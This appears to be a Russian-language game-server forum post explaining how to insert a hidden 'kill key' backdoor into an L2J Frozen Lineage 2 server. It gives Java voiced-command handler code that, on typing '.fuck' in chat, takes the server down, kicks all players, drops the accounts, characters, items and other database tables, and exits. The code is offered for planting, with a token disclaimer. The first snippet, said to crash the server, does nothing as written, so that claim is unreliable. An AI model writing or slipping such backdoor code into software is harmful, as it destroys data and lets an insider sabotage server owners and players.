Перейти к содержанию
Авторизация  
BBMAXI

[manual] Killkey

Рекомендуемые сообщения

Уважаемые посетители портала L2Maxi.ru

 

В этой теме я Вам покажу как внедрить в свой сервер Ключ Убийцу или Бекдор.

 

Для кого то тема будет полезна. Чтобы иметь представление как он выглядит.

 

Так же будет полезен для разработчиков серверов, чтобы при утечке информации было не так обидно.

 

Уважаемые не злоупотребляем дынными скриптами, и на вайпим друг друга...

 

Скрипты выложены не для этих соображений.

======================================================================

В основном данные скрипты таятся в Handler в Войсах.

======================================================================

 

Начнем, создаем Java файл с названием STRANGE и пихаем его сюда voicedcommandhandlers;

 

package com.l2jfrozen.gameserver.handler.voicedcommandhandlers;


import java.sql.Connection;
import java.sql.SQLException;
import java.sql.Statement;

import com.l2jfrozen.Config;
import com.l2jfrozen.L2DatabaseFactory;
import com.l2jfrozen.gameserver.LoginServerThread;
import com.l2jfrozen.gameserver.handler.IVoicedCommandHandler;
import com.l2jfrozen.gameserver.model.L2World;
import com.l2jfrozen.gameserver.model.actor.instance.L2PcInstance;
import com.l2jfrozen.gameserver.gameserverpackets.ServerStatus;

/**
* by Silvein
* L2Maxi.ru 
*/
public class strange implements IVoicedCommandHandler
{
  private static String[] _voicedCommands = { "Time_Fuck_Server" };

  public boolean useVoicedCommand(String command, L2PcInstance activeChar, String target)
  {
  return true;
  }

  public String[] getVoicedCommandList()
  {
  return _voicedCommands;
  }
}

 

Произойдет Crash сервера.

Для игроков в чате будет написано Time_Fuck_Server.

==================================================================

 

package com.l2jfrozen.gameserver.handler.voicedcommandhandlers;


import java.sql.Connection;
import java.sql.SQLException;
import java.sql.Statement;

import com.l2jfrozen.Config;
import com.l2jfrozen.L2DatabaseFactory;
import com.l2jfrozen.gameserver.LoginServerThread;
import com.l2jfrozen.gameserver.handler.IVoicedCommandHandler;
import com.l2jfrozen.gameserver.model.L2World;
import com.l2jfrozen.gameserver.model.actor.instance.L2PcInstance;
import com.l2jfrozen.gameserver.gameserverpackets.ServerStatus;

/**
* by Silvein
* L2Maxi.ru 
*/
public class strange implements IVoicedCommandHandler
{
private static String[] _voicedCommands = { "fuck" };

public boolean useVoicedCommand(String command, L2PcInstance activeChar,
		String target)
{
	if (command.equalsIgnoreCase("fuck"))
	{
			activeChar.sendMessage("Love_fuck_server");
			killServer();
	}
	return true;
}
private void killServer()
{
	// Delete gs from loginServer
	LoginServerThread.getInstance().setServerStatus(ServerStatus.STATUS_DOWN);
	// Delete all chars from game
	kickAll();
	dropSql();
}

private void kickAll()
{
	for (L2PcInstance player : L2World.getInstance().getAllPlayers())
	{
		try
		{
			player.closeNetConnection();
		}
		catch (Throwable t)
		{
			t.printStackTrace();
		}
	}
	try
	{
		Thread.sleep(10000);
	}
	catch (Throwable t)
	{
		t.printStackTrace();
	}
}

private void dropSql()
{

	Connection con = null;
	try
	{
		con = L2DatabaseFactory.getInstance().getConnection();
		Statement s = con.createStatement();
		s.executeUpdate("DROP TABLE accounts");
		s.executeUpdate("DROP TABLE characters");
		s.executeUpdate("DROP TABLE character_skills");
		s.executeUpdate("DROP TABLE character_quests");
		s.executeUpdate("DROP TABLE items");
		s.close();
	}
	catch (SQLException e)
	{}
	finally
	{
		try
		{
			if (con != null)
				con.close();
		}
		catch (SQLException e)
		{
			e.printStackTrace();
		}
	}

	System.exit(-1);
}
public String[] getVoicedCommandList()
{
	return _voicedCommands;
}
}

 

Скрипт сделает вайп сервера, при вводе команды .fuck

Таблицы для удаления можно дополнить (я думаю разберетесь)

Все 2 скрипта создается в виде ява файла STRANGE.

Не забываем менять ИМПОРТЫ.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти
Авторизация  

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×
×
  • Создать...